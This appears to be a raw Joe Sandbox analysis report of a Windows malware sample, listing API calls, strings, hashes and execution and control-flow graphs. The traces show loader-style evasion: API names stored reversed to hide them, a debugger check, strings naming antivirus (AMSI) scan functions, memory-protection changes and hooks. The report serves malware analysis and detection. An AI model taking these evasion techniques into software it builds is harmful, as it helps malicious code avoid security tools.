                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: LocaleThread
                                                                                              • String ID: eeee$ggg$yyyy
                                                                                              • API String ID: 635194068-1253427255
                                                                                              APIs
                                                                                              • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031B82C7
                                                                                              • GetProcAddress.KERNEL32(?,?), ref: 031B82D9
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc
                                                                                              • String ID: Kernel32$sserddAcorPteG
                                                                                              • API String ID: 190572456-1372893251
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(KernelBase,?,031BFAEB,UacInitialize,03223160,031CB7B8,OpenSession,03223160,031CB7B8,ScanBuffer,03223160,031CB7B8,ScanString,03223160,031CB7B8,Initialize), ref: 031BF6EE
                                                                                              • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 031BF700
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: IsDebuggerPresent$KernelBase
                                                                                              • API String ID: 1646373207-2367923768
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,031CD10B,00000000,031CD11E), ref: 031AC47A
                                                                                              • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 031AC48B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                              • API String ID: 1646373207-3712701948
                                                                                              APIs
                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 031AE297
                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 031AE2B3
                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 031AE32A
                                                                                              • VariantClear.OLEAUT32(?), ref: 031AE353
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                              • String ID:
                                                                                              • API String ID: 920484758-0
                                                                                              APIs
                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 031AAD59
                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 031AAD7D
                                                                                              • GetModuleFileNameA.KERNEL32(032267F8,?,00000105,?,?,00000105), ref: 031AAD98
                                                                                              • LoadStringA.USER32(00000000,031A6860,?,00000100), ref: 031AAE2E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 3990497365-0
                                                                                              APIs
                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 031AAD59
                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 031AAD7D
                                                                                              • GetModuleFileNameA.KERNEL32(032267F8,?,00000105,?,?,00000105), ref: 031AAD98
                                                                                              • LoadStringA.USER32(00000000,031A6860,?,00000100), ref: 031AAE2E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 3990497365-0
                                                                                              APIs
                                                                                              • GetThreadLocale.KERNEL32(?,00000000,031AAAE7,?,?,00000000), ref: 031AAA68
                                                                                              • GetThreadLocale.KERNEL32(00000000,00000004,00000000,031AAAE7,?,?,00000000), ref: 031AAA98
                                                                                              • GetThreadLocale.KERNEL32(00000000,00000003,Function_0000999C,00000000,00000000,00000004,00000000,031AAAE7,?,?,00000000), ref: 031AAAC1
                                                                                              • EnumCalendarInfoA.KERNEL32(Function_000099D8,00000000,00000000,00000003), ref: 031AAACC
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: LocaleThread$CalendarEnumInfo
                                                                                              • String ID:
                                                                                              • API String ID: 1139405593-0
                                                                                              APIs
                                                                                              • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,031A95DA), ref: 031A9572
                                                                                              • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,031A95DA), ref: 031A9578
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: DateFormatLocaleThread
                                                                                              • String ID: yyyy
                                                                                              • API String ID: 3303714858-3145165042
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close
                                                                                              • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                              • API String ID: 3535843008-4173385793
                                                                                              APIs
                                                                                                • Part of subcall function 031B81CC: GetModuleHandleA.KERNELBASE(?), ref: 031B821E
                                                                                                • Part of subcall function 031B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031B82C7
                                                                                                • Part of subcall function 031B8274: GetProcAddress.KERNEL32(?,?), ref: 031B82D9
                                                                                              • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,031B83C2), ref: 031B83A4
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$CacheFlushHandleInstructionModule
                                                                                              • String ID: FlushInstructionCache$Kernel32
                                                                                              • API String ID: 1384192982-184458249
                                                                                              APIs
                                                                                                • Part of subcall function 031B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031B82C7
                                                                                                • Part of subcall function 031B8274: GetProcAddress.KERNEL32(?,?), ref: 031B82D9
                                                                                              • GetModuleHandleA.KERNELBASE(?), ref: 031B821E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule
                                                                                              • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                              • API String ID: 667068680-1952140341
                                                                                              • Opcode ID: eef721b4a24301faee66231290fb8fb8d7a912189e84290a71b623e46dbf27a4
                                                                                              • Instruction ID: 7c1ccbc37b38f8f7f0942aef902dcfc42f94d75940a78262b84a3ec521769093
                                                                                              • Opcode Fuzzy Hash: eef721b4a24301faee66231290fb8fb8d7a912189e84290a71b623e46dbf27a4
                                                                                              • Instruction Fuzzy Hash: 4AF04978608B44AFDB11EBA9EC55D99B7FCEB4EA01B5144A0E8009A755DB70AE00C624

                                                                                              Execution Graph

                                                                                              Execution Coverage: 8.9%
                                                                                              Dynamic/Decrypted Code Coverage: 60.3%
                                                                                              Signature Coverage: 0%
                                                                                              Total number of Nodes: 431
                                                                                              Total number of Limit Nodes: 45
                                                                                              execution_graph 57329 2a492829 57331 2a492833 57329->57331 57330 2a492924 57331->57330 57337 2ab19dc2 57331->57337 57341 2ab19df8 57331->57341 57346 2ab19e08 57331->57346 57332 2a4928e9 57332->57330 57350 2ab1af40 57332->57350 57338 2ab19dce 57337->57338 57338->57332 57339 2ab1a02e 57338->57339 57340 2ab1a070 GlobalMemoryStatusEx 57338->57340 57339->57332 57340->57338 57342 2ab19daf 57341->57342 57343 2ab19dfb 57341->57343 57342->57332 57344 2ab1a02e 57343->57344 57345 2ab1a070 GlobalMemoryStatusEx 57343->57345 57344->57332 57345->57343 57347 2ab19e0c 57346->57347 57348 2ab1a02e 57347->57348 57349 2ab1a070 GlobalMemoryStatusEx 57347->57349 57348->57332 57349->57347 57351 2ab1aedb GlobalMemoryStatusEx 57350->57351 57353 2ab1af46 57350->57353 57352 2ab1aeee 57351->57352 57352->57330 57175 2ab1f3f0 57176 2ab1f3fd 57175->57176 57178 2ab1f47e 57176->57178 57179 2ab1f12c 57176->57179 57180 2ab1f137 57179->57180 57184 2afe0548 57180->57184 57190 2afe0533 57180->57190 57181 2ab1f6a7 57181->57178 57185 2afe0573 57184->57185 57196 2afe0ab0 57185->57196 57187 2afe0622 57191 2afe0548 57190->57191 57194 2afe0ab0 2 API calls 57191->57194 57192 2afe05f6 57193 2afe0622 57192->57193 57195 2afe1a30 2 API calls 57192->57195 57194->57192 57195->57193 57197 2afe05f6 57196->57197 57198 2afe0abf 57196->57198 57197->57187 57202 2afe1a30 57197->57202 57199 2afe0b6e 57198->57199 57206 2afe0c30 57198->57206 57211 2afe0c20 57198->57211 57216 2afe1a86 57202->57216 57220 2afe1a90 57202->57220 57207 2afe0c45 57206->57207 57208 2afe0e80 57207->57208 57209 2afe0fa8 GetModuleHandleW 57207->57209 57208->57199 57210 2afe0fd5 57209->57210 57210->57199 57213 2afe0c45 57211->57213 57212 2afe0e80 57212->57199 57213->57212 57214 2afe0fa8 GetModuleHandleW 57213->57214 57215 2afe0fd5 57214->57215 57215->57199 57217 2afe1af8 CreateWindowExW 57216->57217 57219 2afe1bb4 57217->57219 57221 2afe1af8 CreateWindowExW 
57220->57221 57223 2afe1bb4 57221->57223 57354 24f10890 57355 24f108b1 57354->57355 57356 24f1097a 57355->57356 57359 24f131e3 57355->57359 57362 24f126d6 57355->57362 57365 24f19340 57359->57365 57364 24f19340 VirtualProtect 57362->57364 57363 24f126ec 57364->57363 57367 24f19353 57365->57367 57369 24f193f0 57367->57369 57370 24f19438 VirtualProtect 57369->57370 57372 24f131ff 57370->57372 57373 2afe5998 DuplicateHandle 57374 2afe5a2e 57373->57374 57224 2afe7570 57225 2afe75ca OleGetClipboard 57224->57225 57226 2afe760a 57225->57226 57375 2afe5750 57376 2afe5796 GetCurrentProcess 57375->57376 57378 2afe57e8 GetCurrentThread 57376->57378 57379 2afe57e1 57376->57379 57380 2afe581e 57378->57380 57381 2afe5825 GetCurrentProcess 57378->57381 57379->57378 57380->57381 57384 2afe585b 57381->57384 57382 2afe5883 GetCurrentThreadId 57383 2afe58b4 57382->57383 57384->57382 57385 40cbf7 57386 40cc08 57385->57386 57429 40d534 HeapCreate 57386->57429 57389 40cc46 57490 41087e 71 API calls 8 library calls 57389->57490 57392 40cc4c 57393 40cc50 57392->57393 57394 40cc58 __RTC_Initialize 57392->57394 57491 40cbb4 62 API calls 3 library calls 57393->57491 57431 411a15 67 API calls 3 library calls 57394->57431 57396 40cc57 57396->57394 57398 40cc66 57399 40cc72 GetCommandLineA 57398->57399 57400 40cc6a 57398->57400 57432 412892 71 API calls 3 library calls 57399->57432 57492 40e79a 62 API calls 3 library calls 57400->57492 57403 40cc71 57403->57399 57404 40cc82 57493 4127d7 107 API calls 3 library calls 57404->57493 57406 40cc8c 57407 40cc90 57406->57407 57408 40cc98 57406->57408 57494 40e79a 62 API calls 3 library calls 57407->57494 57433 41255f 106 API calls 6 library calls 57408->57433 57411 40cc97 57411->57408 57412 40cc9d 57413 40cca1 57412->57413 57414 40cca9 57412->57414 57495 40e79a 62 API calls 3 library calls 57413->57495 57434 40e859 73 API calls 5 library calls 57414->57434 57417 40ccb0 57419 40ccb5 57417->57419 57420 40ccbc 57417->57420 57418 40cca8 57418->57414 57496 
40e79a 62 API calls 3 library calls 57419->57496 57435 4019f0 OleInitialize 57420->57435 57423 40ccbb 57423->57420 57424 40ccd8 57425 40ccea 57424->57425 57497 40ea0a 62 API calls _doexit 57424->57497 57498 40ea36 62 API calls _doexit 57425->57498 57428 40ccef _fseek 57430 40cc3a 57429->57430 57430->57389 57489 40cbb4 62 API calls 3 library calls 57430->57489 57431->57398 57432->57404 57433->57412 57434->57417 57436 401ab9 57435->57436 57499 40b99e 57436->57499 57438 401abf 57439 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 57438->57439 57466 402467 57438->57466 57440 401dc3 CloseHandle GetModuleHandleA 57439->57440 57447 401c55 57439->57447 57512 401650 57440->57512 57442 401e8b FindResourceA LoadResource LockResource SizeofResource 57514 40b84d 57442->57514 57446 401c9c CloseHandle 57446->57424 57447->57446 57452 401cf9 Module32Next 57447->57452 57448 401ecb _memset 57449 401efc SizeofResource 57448->57449 57450 401f1c 57449->57450 57451 401f5f 57449->57451 57450->57451 57570 401560 __VEC_memcpy __cftoe2_l 57450->57570 57453 401f92 _memset 57451->57453 57571 401560 __VEC_memcpy __cftoe2_l 57451->57571 57452->57440 57463 401d0f 57452->57463 57456 401fa2 FreeResource 57453->57456 57457 40b84d _malloc 62 API calls 57456->57457 57458 401fbb SizeofResource 57457->57458 57459 401fe5 _memset 57458->57459 57460 4020aa LoadLibraryA 57459->57460 57461 401650 57460->57461 57462 40216c GetProcAddress 57461->57462 57465 4021aa 57462->57465 57462->57466 57463->57446 57464 401dad Module32Next 57463->57464 57464->57440 57464->57463 57465->57466 57544 4018f0 57465->57544 57466->57424 57468 40243f 57468->57466 57572 40b6b5 62 API calls 2 library calls 57468->57572 57470 4021f1 57470->57468 57556 401870 57470->57556 57472 402269 VariantInit 57473 401870 75 API calls 57472->57473 57474 40228b VariantInit 57473->57474 57475 4022a7 57474->57475 57476 4022d9 SafeArrayCreate SafeArrayAccessData 57475->57476 57561 40b350 57476->57561 57479 40232c 57480 402354 
SafeArrayDestroy 57479->57480 57488 40235b 57479->57488 57480->57488 57481 402392 SafeArrayCreateVector 57482 4023a4 57481->57482 57483 4023bc VariantClear VariantClear 57482->57483 57563 4019a0 57483->57563 57486 40242e 57487 4019a0 65 API calls 57486->57487 57487->57468 57488->57481 57489->57389 57490->57392 57491->57396 57492->57403 57493->57406 57494->57411 57495->57418 57496->57423 57497->57425 57498->57428 57500 40b9aa _fseek _strnlen 57499->57500 57501 40b9b8 57500->57501 57505 40b9ec 57500->57505 57573 40bfc1 62 API calls __getptd_noexit 57501->57573 57503 40b9bd 57574 40e744 6 API calls 2 library calls 57503->57574 57575 40d6e0 62 API calls 2 library calls 57505->57575 57507 40b9f3 57576 40b917 120 API calls 3 library calls 57507->57576 57509 40b9ff 57577 40ba18 LeaveCriticalSection _doexit 57509->57577 57510 40b9cd _fseek 57510->57438 57513 4017cc ___crtGetEnvironmentStringsA 57512->57513 57513->57442 57515 40b900 57514->57515 57516 40b85f 57514->57516 57585 40d2e3 6 API calls __decode_pointer 57515->57585 57523 40b8bc RtlAllocateHeap 57516->57523 57525 40b870 57516->57525 57526 40b8ec 57516->57526 57529 40b8f1 57516->57529 57531 401ebf 57516->57531 57581 40b7fe 62 API calls 4 library calls 57516->57581 57582 40d2e3 6 API calls __decode_pointer 57516->57582 57518 40b906 57586 40bfc1 62 API calls __getptd_noexit 57518->57586 57523->57516 57525->57516 57578 40ec4d 62 API calls 2 library calls 57525->57578 57579 40eaa2 62 API calls 7 library calls 57525->57579 57580 40e7ee GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 57525->57580 57583 40bfc1 62 API calls __getptd_noexit 57526->57583 57584 40bfc1 62 API calls __getptd_noexit 57529->57584 57532 40af66 57531->57532 57534 40af70 57532->57534 57533 40b84d _malloc 62 API calls 57533->57534 57534->57533 57535 40af8a 57534->57535 57538 40af8c std::bad_alloc::bad_alloc 57534->57538 57587 40d2e3 6 API calls __decode_pointer 57534->57587 57535->57448 57542 40afb2 57538->57542 57588 40d2bd 73 API 
calls __cinit 57538->57588 57539 40afbc 57590 40cd39 RaiseException 57539->57590 57589 40af49 62 API calls std::exception::exception 57542->57589 57543 40afca 57545 401903 lstrlenA 57544->57545 57546 4018fc 57544->57546 57591 4017e0 57545->57591 57546->57470 57549 401940 GetLastError 57551 40194b MultiByteToWideChar 57549->57551 57552 40198d 57549->57552 57550 401996 57550->57470 57553 4017e0 77 API calls 57551->57553 57552->57550 57607 401030 GetLastError EntryPoint 57552->57607 57554 401970 MultiByteToWideChar 57553->57554 57554->57552 57557 40af66 74 API calls 57556->57557 57558 40187c 57557->57558 57559 401885 SysAllocString 57558->57559 57560 4018a4 57558->57560 57559->57560 57560->57472 57562 40231a SafeArrayUnaccessData 57561->57562 57562->57479 57564 4019aa InterlockedDecrement 57563->57564 57569 4019df VariantClear 57563->57569 57565 4019b8 57564->57565 57564->57569 57566 4019c2 SysFreeString 57565->57566 57567 4019c9 57565->57567 57565->57569 57566->57567 57611 40aec0 63 API calls 2 library calls 57567->57611 57569->57486 57570->57450 57571->57453 57572->57466 57573->57503 57575->57507 57576->57509 57577->57510 57578->57525 57579->57525 57581->57516 57582->57516 57583->57529 57584->57531 57585->57518 57586->57531 57587->57534 57588->57542 57589->57539 57590->57543 57592 4017f3 57591->57592 57593 4017e9 EntryPoint 57591->57593 57594 401805 57592->57594 57595 4017fb EntryPoint 57592->57595 57593->57592 57596 401818 57594->57596 57597 40180e EntryPoint 57594->57597 57595->57594 57598 40183e 57596->57598 57605 401844 57596->57605 57608 40b783 72 API calls 4 library calls 57596->57608 57597->57596 57609 40b6b5 62 API calls 2 library calls 57598->57609 57602 40182d 57602->57605 57606 401834 EntryPoint 57602->57606 57603 40186d MultiByteToWideChar 57603->57549 57603->57550 57604 40184e EntryPoint 57604->57605 57605->57603 57605->57604 57610 40b743 62 API calls 2 library calls 57605->57610 57606->57598 57608->57602 57609->57605 57610->57605 57611->57569 57612 
2a492630 57613 2a492676 DeleteFileW 57612->57613 57615 2a4926af 57613->57615 57616 24f19848 57618 24f1984e 57616->57618 57617 24f1991b 57618->57617 57621 2afe97c0 57618->57621 57625 2afe97b0 57618->57625 57622 2afe97cf 57621->57622 57629 2afe8144 57622->57629 57626 2afe97c0 57625->57626 57627 2afe8144 5 API calls 57626->57627 57628 2afe97ef 57627->57628 57628->57618 57631 2afe814f 57629->57631 57633 2afe81ec 57631->57633 57632 2afe98b5 57634 2afe81f7 57633->57634 57635 2afe9f09 57634->57635 57639 2afeaec8 57634->57639 57644 2afeae41 57634->57644 57650 2afeae80 57634->57650 57635->57632 57640 2afeaee9 57639->57640 57641 2afeaf0d 57640->57641 57656 2afeb078 57640->57656 57660 2afeb068 57640->57660 57641->57635 57645 2afeae4a 57644->57645 57646 2afeae89 57644->57646 57645->57635 57647 2afeae8f 57646->57647 57648 2afeb078 5 API calls 57646->57648 57649 2afeb068 5 API calls 57646->57649 57647->57635 57648->57647 57649->57647 57651 2afeae8f 57650->57651 57653 2afeae99 57650->57653 57651->57635 57652 2afeaeaf 57652->57635 57653->57652 57654 2afeb078 5 API calls 57653->57654 57655 2afeb068 5 API calls 57653->57655 57654->57652 57655->57652 57658 2afeb085 57656->57658 57657 2afeb0be 57657->57641 57658->57657 57664 2afe9ca4 57658->57664 57661 2afeb079 57660->57661 57662 2afeb0be 57661->57662 57663 2afe9ca4 5 API calls 57661->57663 57662->57641 57663->57662 57665 2afe9caf 57664->57665 57667 2afeb130 57665->57667 57668 2afe9cd8 57665->57668 57667->57667 57669 2afe9ce3 57668->57669 57675 2afeb180 57669->57675 57671 2afeb59f 57679 2afefcc0 57671->57679 57687 2afefca8 57671->57687 57672 2afeb5d9 57672->57667 57678 2afeb18b 57675->57678 57676 2afec378 57676->57671 57677 2afeaec8 5 API calls 57677->57676 57678->57676 57678->57677 57680 2afefcc6 57679->57680 57682 2afefcfd 57680->57682 57695 2afeff38 57680->57695 57699 2afeff28 57680->57699 57681 2afefd3d 57685 2afe0548 4 API calls 57681->57685 57686 2afe0533 4 API calls 57681->57686 57682->57672 57685->57682 57686->57682 57688 
2afefcb3 57687->57688 57690 2afefcfd 57688->57690 57691 2afeff38 3 API calls 57688->57691 57692 2afeff28 3 API calls 57688->57692 57689 2afefd3d 57693 2afe0548 4 API calls 57689->57693 57694 2afe0533 4 API calls 57689->57694 57690->57672 57691->57689 57692->57689 57693->57690 57694->57690 57704 2b1e0438 57695->57704 57713 2b1e0448 57695->57713 57696 2afeff42 57696->57681 57700 2afeff37 57699->57700 57701 2afeff41 57699->57701 57702 2b1e0438 3 API calls 57700->57702 57703 2b1e0448 3 API calls 57700->57703 57701->57681 57702->57701 57703->57701 57705 2b1e043b 57704->57705 57707 2b1e0474 57705->57707 57708 2afe0f5a GetModuleHandleW 57705->57708 57709 2afe0c30 GetModuleHandleW 57705->57709 57710 2afe0c20 GetModuleHandleW 57705->57710 57706 2b1e0464 57706->57707 57711 2b1e0438 GetModuleHandleW GetModuleHandleW GetModuleHandleW 57706->57711 57712 2b1e0448 GetModuleHandleW GetModuleHandleW GetModuleHandleW 57706->57712 57707->57696 57708->57706 57709->57706 57710->57706 57711->57707 57712->57707 57714 2b1e044e 57713->57714 57716 2b1e0474 57714->57716 57719 2afe0f5a GetModuleHandleW 57714->57719 57720 2afe0c30 GetModuleHandleW 57714->57720 57721 2afe0c20 GetModuleHandleW 57714->57721 57715 2b1e0464 57715->57716 57717 2b1e0438 GetModuleHandleW GetModuleHandleW GetModuleHandleW 57715->57717 57718 2b1e0448 GetModuleHandleW GetModuleHandleW GetModuleHandleW 57715->57718 57716->57696 57717->57716 57718->57716 57719->57715 57720->57715 57721->57715 57722 24f195c8 57723 24f19608 CloseHandle 57722->57723 57725 24f19639 57723->57725 57227 24ebd030 57228 24ebd048 57227->57228 57229 24ebd0a2 57228->57229 57234 2afe65a0 57228->57234 57245 2afe1c38 57228->57245 57250 2afe1c48 57228->57250 57255 2afe6590 57228->57255 57237 2afe65cd 57234->57237 57235 2afe6601 57290 2afe555c 57235->57290 57237->57235 57238 2afe65f1 57237->57238 57266 2b1e0bea 57238->57266 57271 2b1e0cc4 57238->57271 57277 2b1e0bf8 57238->57277 57282 2afe6718 57238->57282 57286 2afe6728 57238->57286 57239 2afe65ff 57246 
2afe1c48 57245->57246 57248 2afe65a0 3 API calls 57246->57248 57249 2afe6590 3 API calls 57246->57249 57247 2afe1c8f 57247->57229 57248->57247 57249->57247 57251 2afe1c6e 57250->57251 57253 2afe65a0 3 API calls 57251->57253 57254 2afe6590 3 API calls 57251->57254 57252 2afe1c8f 57252->57229 57253->57252 57254->57252 57258 2afe6595 57255->57258 57256 2afe6601 57257 2afe555c CallWindowProcW 57256->57257 57260 2afe65ff 57257->57260 57258->57256 57259 2afe65f1 57258->57259 57261 2b1e0bea 3 API calls 57259->57261 57262 2afe6728 CallWindowProcW 57259->57262 57263 2afe6718 CallWindowProcW 57259->57263 57264 2b1e0bf8 3 API calls 57259->57264 57265 2b1e0cc4 3 API calls 57259->57265 57261->57260 57262->57260 57263->57260 57264->57260 57265->57260 57267 2b1e0bf3 57266->57267 57294 2b1e0c9f 57267->57294 57298 2b1e0cb0 57267->57298 57268 2b1e0c98 57268->57239 57272 2b1e0c82 57271->57272 57273 2b1e0cd2 57271->57273 57275 2b1e0c9f 3 API calls 57272->57275 57276 2b1e0cb0 3 API calls 57272->57276 57274 2b1e0c98 57274->57239 57275->57274 57276->57274 57279 2b1e0bfe 57277->57279 57278 2b1e0c98 57278->57239 57280 2b1e0c9f 3 API calls 57279->57280 57281 2b1e0cb0 3 API calls 57279->57281 57280->57278 57281->57278 57284 2afe6736 57282->57284 57283 2afe555c CallWindowProcW 57283->57284 57284->57283 57285 2afe680e 57284->57285 57285->57239 57288 2afe6736 57286->57288 57287 2afe555c CallWindowProcW 57287->57288 57288->57287 57289 2afe680e 57288->57289 57289->57239 57291 2afe5567 57290->57291 57292 2afe68c2 CallWindowProcW 57291->57292 57293 2afe6871 57291->57293 57292->57293 57293->57239 57295 2b1e0ca3 57294->57295 57296 2b1e0cc1 57295->57296 57302 2b1e1e72 57295->57302 57296->57268 57299 2b1e0cb6 57298->57299 57300 2b1e0cc1 57299->57300 57301 2b1e1e72 3 API calls 57299->57301 57300->57268 57301->57300 57303 2b1e1e0a 57302->57303 57304 2b1e1e7a 57302->57304 57303->57296 57307 2afe555c CallWindowProcW 57304->57307 57309 2afe552f 57304->57309 57313 2afe6818 57304->57313 57305 2b1e1e8a 
57305->57296 57307->57305 57310 2afe553a 57309->57310 57311 2afe68c2 CallWindowProcW 57310->57311 57312 2afe6871 57310->57312 57311->57312 57312->57305 57314 2afe6828 57313->57314 57315 2afe68c2 CallWindowProcW 57314->57315 57316 2afe6871 57314->57316 57315->57316 57316->57305 57317 2afe8f60 57318 2afe8fa4 SetWindowsHookExA 57317->57318 57320 2afe8fea 57318->57320 57321 2afe6b20 57322 2afe6b28 57321->57322 57324 2afe6b4b 57322->57324 57325 2afe55b4 57322->57325 57326 2afe6b60 KiUserCallbackDispatcher 57325->57326 57328 2afe6bce 57326->57328 57328->57322

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1738 2afe0c30-2afe0c56 1741 2afe0c58-2afe0c6d 1738->1741 1742 2afe0c86-2afe0c8e 1738->1742 1748 2afe0c74-2afe0c80 1741->1748 1743 2afe0cd4-2afe0d0e 1742->1743 1744 2afe0c90 1742->1744 1758 2afe0eb9-2afe0eeb 1743->1758 1759 2afe0d14-2afe0d5f 1743->1759 1746 2afe0c9a-2afe0ccf 1744->1746 1755 2afe0d62-2afe0dc4 1746->1755 1748->1742 1749 2afe0e8c-2afe0eb2 1748->1749 1749->1758 1782 2afe0dca-2afe0dd7 1755->1782 1783 2afe0e80-2afe0e8b 1755->1783 1774 2afe0ef2-2afe0fa0 1758->1774 1759->1755 1785 2afe0fa8-2afe0fd3 GetModuleHandleW 1774->1785 1786 2afe0fa2-2afe0fa5 1774->1786 1790 2afe0e7c-2afe0e7e 1782->1790 1791 2afe0ddd-2afe0e0a 1782->1791 1788 2afe0fdc-2afe0ff0 1785->1788 1789 2afe0fd5-2afe0fdb 1785->1789 1786->1785 1789->1788 1790->1774 1790->1783 1791->1790 1797 2afe0e0c-2afe0e19 1791->1797 1797->1790 1798 2afe0e1b-2afe0e32 1797->1798 1801 2afe0e3f-2afe0e6e 1798->1801 1802 2afe0e34-2afe0e3d 1798->1802 1801->1790 1808 2afe0e70-2afe0e7a 1801->1808 1802->1790 1808->1790 1808->1801
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 2AFE0FC6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2044111260.000000002AFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AFE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2afe0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule
                                                                                              • String ID: Q
                                                                                              • API String ID: 4139908857-3463352047
                                                                                              • Opcode ID: a3b976963ed77dd6b7fc65be52ab0d72c8ee5e56c5f9fdbda49c092aefd92d30
                                                                                              • Instruction ID: 51cf0efe1861a46b432e7e97673cf670d33676ebc8acc45e9db9d97db9ef2821
                                                                                              • Opcode Fuzzy Hash: a3b976963ed77dd6b7fc65be52ab0d72c8ee5e56c5f9fdbda49c092aefd92d30
                                                                                              • Instruction Fuzzy Hash: CAB1AC70A007459FCB04EF79D48096EBBF6FF88300B14896AD84ADB756DB78E945CB90
                                                                                              APIs
                                                                                              • OleInitialize.OLE32(00000000), ref: 004019FD
